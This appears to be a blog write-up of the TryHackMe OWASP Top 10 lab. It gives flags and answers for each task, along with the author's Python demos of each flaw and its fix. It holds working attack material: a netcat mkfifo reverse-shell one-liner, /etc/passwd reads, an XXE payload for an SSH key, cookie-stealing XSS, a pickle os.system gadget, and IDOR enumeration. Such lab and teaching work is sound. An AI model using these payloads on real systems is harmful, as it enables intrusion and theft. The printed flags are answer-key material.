tryhackme--OWASP Top 10
PS:
The first four Tasks are introductory reading; just mark each of them complete.
Open the page the task points at, http://10.10.141.123/evilshell.php: it runs whatever command you submit. Get a reverse shell first, because working through the web form is clumsy. Start the listener on the attacking machine before submitting the payload:
nc -lvp 4444 #attacking machine
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.xx.xx 4444 >/tmp/f #target, submitted through evilshell.php (10.9.xx.xx is the attacking machine's VPN address)
Task 5 [Severity 1] Command Injection Practical
Task 5's questions are identical to the ones in the previous post, so here is a quick recap.
What strange text file is in the website root directory?
ls -al
drpepper.txt
How many non-root/non-service/non-daemon users are there?
grep /bin/bash /etc/passwd #accounts with an interactive bash shell; only root shows up here
0
What user is this app running as?
id
www-data
What is the user's shell set as?
grep '^www-data' /etc/passwd #the last field of the entry is the login shell; $SHELL is not reliable inside a web shell
/usr/sbin/nologin
What version of Ubuntu is running?
cat /etc/issue
18.04.4
Print out the MOTD. What favorite beverage is shown?
cat drpepper.txt
Dr Pepper
Task 7 [Severity 2] Broken Authentication Practical
What is the flag that you found in darren’s account?
Register a new account with the username darren followed by a trailing space ('darren '), with any password and email. Although 'darren ' is technically a new user, it ends up with the same access as darren, so log in with the 'darren ' account you just registered.
fe86079416a21a3c99937fea8874b667
What is the flag that you found in arthur’s account?
Same method for the arthur account.
d9ac0f7db4fda460ac3edeb75d75e16e
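Added example of how the trailing-space trick can turn into another user's account (my code, not the room's and not this post's). The lab's source is not shown, so the mechanism modelled here, an exact-match uniqueness check at registration paired with a whitespace-normalizing lookup after login, is an assumption; usernames, passwords and the "darren-flag" value are constructed. The hardened class applies one canonical form at the boundary and uses it everywhere.

```python
import hashlib
import hmac
import unicodedata


def _digest(password: str) -> str:
    # Demo only: real code stores a salted, slow hash (scrypt/argon2/bcrypt).
    return hashlib.sha256(password.encode()).hexdigest()


class VulnerableAuth:
    """Assumed lab behaviour: registration compares the raw username, but the
    account lookup after login strips whitespace, so 'darren ' is accepted as
    a new user and then resolves to darren's record."""

    def __init__(self):
        # constructed seed data; "darren-flag" stands in for the real flag
        self.users = {"darren": {"pw": _digest("s3cret"), "flag": "darren-flag"}}

    def register(self, username: str, password: str) -> None:
        if username in self.users:  # exact match: 'darren ' != 'darren'
            raise ValueError("username taken")
        self.users[username] = {"pw": _digest(password), "flag": "none yet"}

    def login(self, username: str, password: str):
        rec = self.users.get(username)
        if rec is None or not hmac.compare_digest(rec["pw"], _digest(password)):
            return None
        # the account page is loaded by a normalized name: this is the bug
        return self.users[username.strip()]


def canonical(username: str) -> str:
    """One normalization, applied everywhere a username enters the system."""
    name = unicodedata.normalize("NFKC", username).casefold().strip()
    if not name or any(ch.isspace() for ch in name):
        raise ValueError("invalid username")
    return name


class HardenedAuth(VulnerableAuth):
    def register(self, username: str, password: str) -> None:
        name = canonical(username)
        if name in self.users:  # 'darren ', 'DARREN' and 'darren' collide here
            raise ValueError("username taken")
        self.users[name] = {"pw": _digest(password), "flag": "none yet"}

    def login(self, username: str, password: str):
        name = canonical(username)
        rec = self.users.get(name)
        if rec is None or not hmac.compare_digest(rec["pw"], _digest(password)):
            return None
        return rec  # the same key is used for the check and for the data
```

The fix is not "strip the input"; it is deciding on one canonical form (here NFKC, casefold, strip) and refusing a registration whose canonical form already exists, so the credential check and the data lookup can never disagree about who the user is.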
Task 11 [Severity 3] Sensitive Data Exposure (Challenge)
What is the name of the mentioned directory?
Routine directory scan.
/assets
Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?
Browsing it reveals the site's database file.
webapp.db
Use the supporting material to access the sensitive data. What is the password hash of the admin user?
Download and open the database: it contains three users and their password hashes.
6eea9b7ef19179a06954edd0f6c05ceb
Crack the hash. What is the admin's plaintext password?
Run the hash through an online MD5 lookup.
qwertyuiop
Login as the admin. What is the flag?
Log in as admin with the cracked password; the admin login page had already turned up in the earlier directory scan.
THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}
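Added example (mine, not the room's material): the "open the database" step and the cracking step done offline in Python. The SQLite table is a constructed stand-in for webapp.db (the column names are an assumption), the Bob and Alice rows are made up, and the four-word list stands in for rockyou.txt. The same crack_md5 function is also run over the admin hash quoted above.

```python
import hashlib
import sqlite3

# Constructed stand-in for rockyou.txt; real cracking uses the full list or hashcat -m 0.
WORDLIST = ["password", "letmein", "qwertyuiop", "123456"]


def build_sample_db() -> sqlite3.Connection:
    """Constructed stand-in for the downloaded webapp.db (column names assumed)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (userID TEXT, username TEXT, password TEXT, admin INTEGER)")
    rows = [
        ("1", "admin", hashlib.md5(b"qwertyuiop").hexdigest(), 1),
        ("2", "Bob", hashlib.md5(b"letmein").hexdigest(), 0),
        ("3", "Alice", hashlib.md5(b"Xq7!not-in-list").hexdigest(), 0),
    ]
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", rows)
    return con


def dump_users(con: sqlite3.Connection):
    """The 'open the database and look' step, as a query."""
    return con.execute("SELECT username, password, admin FROM users").fetchall()


def crack_md5(digest: str, wordlist):
    """Unsalted MD5 is a lookup, not a barrier: one hash per candidate word."""
    digest = digest.lower()
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None


def crack_all(con: sqlite3.Connection, wordlist) -> dict:
    return {user: crack_md5(h, wordlist) for user, h, _ in dump_users(con)}


def admin_password(con: sqlite3.Connection, wordlist):
    """What the login step needs: the plaintext for the row flagged admin=1."""
    for user, h, is_admin in dump_users(con):
        if is_admin:
            return user, crack_md5(h, wordlist)
    return None


def hash_for_storage(password: str, salt: bytes) -> str:
    """What the app should have stored instead: a salted, memory-hard hash."""
    return hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1).hex()
```

Two things make this trivial for the attacker: the database was served from a web-accessible directory, and the hashes are unsalted MD5, so every leaked hash costs one lookup. hash_for_storage shows the storage side of the fix; keeping webapp.db out of the document root is the other half.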
Task 13 [Severity 4] XML External Entity - eXtensible Markup Language
Most of the answers are in the question text itself.
Full form of XML
eXtensible Markup Language
Is it compulsory to have XML prolog in XML documents?
no
Can we validate XML documents against a schema?
yes
How can we specify XML version and encoding in XML document?
XML prolog
Task 14 [Severity 4] XML External Entity - DTD
How do you define a new ELEMENT?
!ELEMENT
How do you define a ROOT element?
!DOCTYPE
How do you define a new ENTITY?
!ENTITY
Task 16 [Severity 4] XML External Entity - Exploiting
Intercept the request and craft an XML payload that reads the file through an external entity.
Where is falcon's SSH key located?
Common knowledge: the default location of a user's private key is /home/falcon/.ssh/id_rsa.
What are the first 18 characters for falcon’s private key
MIIEogIBAAKCAQEA7b
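Added example (mine, not the room's): the payload shape used above, fed to Python's standard-library SAX parser with external general entities switched on (the vulnerable configuration) and off (the default since Python 3.7.1). The "key" is a constructed file in a temporary directory; nothing here touches the lab's real id_rsa.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


def xxe_payload(path: str) -> str:
    """Same shape as the payload used against the lab: an external entity that
    points at a local file, expanded inside an element the app echoes back."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE data [<!ENTITY xxe SYSTEM "file://{path}">]>\n'
        "<data><name>&xxe;</name></data>"
    )


class _Collect(ContentHandler):
    """Gathers the text of every element, i.e. what a vulnerable app reflects."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_xml(document: str, allow_external_entities: bool) -> str:
    parser = xml.sax.make_parser()
    # True reproduces the vulnerable configuration; False is the stdlib default.
    parser.setFeature(feature_external_ges, allow_external_entities)
    handler = _Collect()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(document.encode()))
    return "".join(handler.chunks)


def run_demo():
    """Returns (secret written to disk, text leaked by the vulnerable parser,
    text produced by the parser with external entities disabled)."""
    with tempfile.TemporaryDirectory() as tmp:
        secret_path = os.path.join(tmp, "id_rsa")  # constructed stand-in for the real key
        secret = "-----BEGIN CONSTRUCTED KEY-----\nnot-a-real-key\n-----END CONSTRUCTED KEY-----\n"
        with open(secret_path, "w") as fh:
            fh.write(secret)
        payload = xxe_payload(secret_path)
        leaked = parse_xml(payload, allow_external_entities=True)
        blocked = parse_xml(payload, allow_external_entities=False)
    return secret, leaked, blocked
```

The only difference between the two calls is one parser feature, which is the whole lesson of the task: the payload is inert against a parser that refuses external entities, and the fix on the server side is to disable them (or DTDs altogether, which the defusedxml package does for every stdlib parser) rather than to filter the input.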
Task 18 [Severity 5] Broken Access Control (IDOR Challenge)
A broken-access-control (IDOR) challenge.
Look at other users' notes. What is the flag?
Intercept the request and brute-force the note ID parameter.
flag{fivefourthree}
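Added example, not the room's code: the ownership check an IDOR lab is missing, next to the enumeration loop that the "intercept and brute-force" step automates (with Burp Intruder or a script). The note ids, owners and bodies are constructed.

```python
# Constructed note store: id -> owner and contents
NOTES = {
    1: {"owner": "alice", "body": "shopping list"},
    2: {"owner": "bob", "body": "flag{constructed}"},
    3: {"owner": "carol", "body": "meeting draft"},
}


def get_note_vulnerable(current_user: str, note_id: int):
    """Authenticated but not authorized: any logged-in user gets any id."""
    return NOTES.get(note_id)


def get_note_fixed(current_user: str, note_id: int):
    """Scope the lookup to the caller; missing and forbidden look the same,
    so the response does not confirm which ids exist."""
    note = NOTES.get(note_id)
    if note is None or note["owner"] != current_user:
        return None
    return note


def enumerate_notes(fetch, current_user: str, id_range) -> dict:
    """What the brute-force step does: walk the id space and keep every hit."""
    found = {}
    for note_id in id_range:
        note = fetch(current_user, note_id)
        if note is not None:
            found[note_id] = note["body"]
    return found
```

Random or UUID identifiers slow the enumeration down but are not authorization; the owner comparison in get_note_fixed is what closes the hole.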
Task 19 [Severity 6] Security Misconfiguration
Hack into the webapp, and find the flag!
Opening the site shows this one tests default credentials.
Google Pensive Notes for its default login.
Log in and you get:
thm{4b9513968fd564a87b28aa1f9d672e17}
Task 20 [Severity 7] Cross-site Scripting
Navigate to http://10.10.150.152/ in your browser and click on the “Reflected XSS” tab on the navbar; craft a reflected XSS payload that will cause a popup saying “Hello”.
payload:
<script>alert('Hello')</script>
ThereIsMoreToXSSThanYouThink
On the same reflective page, craft a reflected XSS payload that will cause a popup with your machine's IP address.
payload:
<script>alert(window.location.host)</script>
ReflectiveXss4TheWin
Now navigate to http://10.10.135.248/stored in your browser and make an account. Then add a comment and see if you can insert some of your own HTML.
Register an account and submit a snippet of HTML as a comment in the Stored XSS section.
HTML_T4gs
I could not reproduce the next two because of environment issues; the payloads are correct, so readers can try them themselves.
On the same page, make an alert popup box appear on the page with your document cookies.
payload:
<script>alert(document.cookie)</script>
Change “XSS Playground” to “I am a hacker” by adding a comment and using Javascript.
Payload:
<script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script>
Task 21 [Severity 8] Insecure Deserialization
Who developed the Tomcat application?
Apache Software Foundation
What type of attack that crashes services can be performed with insecure deserialization?
Denial of Service
Task 22 [Severity 8] Insecure Deserialization - Objects
if a dog was sleeping, would this be:
A) A State
B) A Behaviour
A Behaviour
Task 23 [Severity 8] Insecure Deserialization - Deserialization
What is the name of the base-2 formatting that data is sent across a network as?
binary
Task 24 [Severity 8] Insecure Deserialization - Cookies
If a cookie had the path of webapp.com/login , what would the URL that the user has to visit be?
webapp.com/login
What is the acronym for the web technology that Secure cookies work over?
https
Task 25 [Severity 8] Insecure Deserialization - Cookies Practical
1st flag (cookie value)
Register an account, log in, look at the cookie and base64-decode it.
2nd flag (admin dashboard)
Intercept the request and change the user type to admin.
The response is a redirect; follow it to the admin dashboard.
THM{heres_the_admin_flag}
Task 26 [Severity 8] Insecure Deserialization - Code Execution
flag.txt
4a69a7ff9fd68
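Added example (mine, not the room's code) covering Task 25 and Task 26 together: first the base64 cookie decode and "change the user type to admin" step, with the HMAC signing that would have made the tampering detectable, then a pickled cookie carrying os.system, which is the code-execution pattern the room's encodedPayload cookie relies on, beside an allow-listing Unpickler. The cookie contents, the key and the Session class are constructed; the field name userType follows the task text.

```python
import base64
import hashlib
import hmac
import io
import json
import os
import pickle

# --- Task 25: base64 is encoding, not protection ---------------------------


def decode_cookie(value: str) -> dict:
    return json.loads(base64.b64decode(value))


def encode_cookie(data: dict) -> str:
    return base64.b64encode(json.dumps(data).encode()).decode()


def escalate(cookie: str) -> str:
    """The 'change the user type to admin' step, applied to a captured cookie."""
    data = decode_cookie(cookie)
    data["userType"] = "admin"
    return encode_cookie(data)


def sign(cookie: str, key: bytes) -> str:
    """Server-side fix: an HMAC over the cookie makes tampering detectable."""
    mac = hmac.new(key, cookie.encode(), hashlib.sha256).hexdigest()
    return cookie + "." + mac


def verify(signed: str, key: bytes):
    """Returns the decoded cookie, or None if the MAC does not match."""
    cookie, _, mac = signed.rpartition(".")
    expected = hmac.new(key, cookie.encode(), hashlib.sha256).hexdigest()
    return decode_cookie(cookie) if hmac.compare_digest(mac, expected) else None


# --- Task 26: unpickling a cookie is code execution -------------------------


class Session:
    """The object the app expects to find in the cookie (constructed)."""

    def __init__(self, user, user_type):
        self.user, self.user_type = user, user_type


class Pwn:
    """__reduce__ tells pickle how to rebuild the object: by calling
    os.system(cmd). pickle.loads runs that before the app sees anything."""

    def __init__(self, cmd):
        self.cmd = cmd

    def __reduce__(self):
        return (os.system, (self.cmd,))


def pickle_cookie(obj) -> str:
    return base64.b64encode(pickle.dumps(obj)).decode()


def load_vulnerable(cookie: str):
    return pickle.loads(base64.b64decode(cookie))  # the lab's pattern


class RestrictedUnpickler(pickle.Unpickler):
    """Allow-list of globals: os.system, subprocess, builtins are all refused."""

    def find_class(self, module, name):
        if module == Session.__module__ and name == "Session":
            return Session
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def load_restricted(cookie: str):
    """Defence in depth only; the real fix is not to unpickle client data at all."""
    try:
        return RestrictedUnpickler(io.BytesIO(base64.b64decode(cookie))).load()
    except pickle.UnpicklingError:
        return None
```

In the lab the command inside __reduce__ is the same mkfifo reverse shell used at the top of this post; here it is a harmless echo. The two halves share one root cause: the server trusts bytes the client controls. A signed JSON cookie fixes the first; for the second, swap pickle for JSON and keep RestrictedUnpickler only where a pickle format cannot be changed.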
Task 29 [Severity 9] Components With Known Vulnerabilities - Lab
How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer)
Click through a few products and an injection point appears: /bookPerPub.php?pubid=2
Google the known vulnerability for this application.
1611
Task 30 [Severity 10] Insufficient Logging and Monitoring
The log shows a string of failed login attempts against different usernames from one source: account/password brute forcing.
What kind of attack is being carried out?
brute force
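Added example (mine, not the room's): the detection logic that turns the log reading above into an alert, run over constructed log lines laid out like the room's sample (status, source IP, username, timestamp, path). The IP addresses are documentation ranges and the usernames are made up; the 60-second window and threshold of three are assumptions to tune.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log lines in the same layout as the room's sample; addresses are
# documentation ranges, not the room's.
SAMPLE_LOG = """\
200 OK           198.51.100.88 jr22          2019-03-18T09:21:17 /login
200 OK           198.51.100.11 Bob1          2019-03-18T10:19:22 /login
401 Unauthorized 203.0.113.16  admin         2019-03-21T21:21:12 /login
401 Unauthorized 203.0.113.16  administrator 2019-03-21T21:21:13 /login
401 Unauthorized 203.0.113.16  anonymous     2019-03-21T21:21:14 /login
401 Unauthorized 203.0.113.16  root          2019-03-21T21:21:15 /login
401 Unauthorized 198.51.100.88 jr22          2019-03-21T21:30:00 /login
"""


def parse_line(line: str) -> dict:
    """Split from the right so a multi-word status text ('Not Found') is safe."""
    status_text, ip, user, ts, path = line.rsplit(maxsplit=4)
    return {
        "status": int(status_text.split()[0]),
        "ip": ip,
        "user": user,
        "time": datetime.fromisoformat(ts),
        "path": path,
    }


def detect_bruteforce(log_text: str, window_seconds: int = 60, threshold: int = 3) -> list:
    """Flag any source IP with >= threshold failed logins inside a sliding window."""
    failures = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_line(line)
        if event["status"] == 401 and event["path"] == "/login":
            failures[event["ip"]].append(event)

    window = timedelta(seconds=window_seconds)
    alerts = []
    for ip, events in failures.items():
        events.sort(key=lambda e: e["time"])
        start = 0
        for end, event in enumerate(events):
            while event["time"] - events[start]["time"] > window:
                start += 1  # drop failures that fell out of the window
            if end - start + 1 >= threshold:
                alerts.append({
                    "ip": ip,
                    "attempts": len(events),
                    "users": sorted({e["user"] for e in events}),
                    "first": events[0]["time"].isoformat(),
                    "last": events[-1]["time"].isoformat(),
                })
                break
    return alerts
```

The single failed jr22 login from 198.51.100.88 is never flagged; the burst from 203.0.113.16 is, and the list of distinct usernames (admin, administrator, root, anonymous) is the detail that tells a guessing attack apart from one user mistyping a password. Without the source IP and username in the log, neither distinction is possible, which is the task's point about insufficient logging.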
PS:
Personal blog: XingHe. You are welcome to drop by ~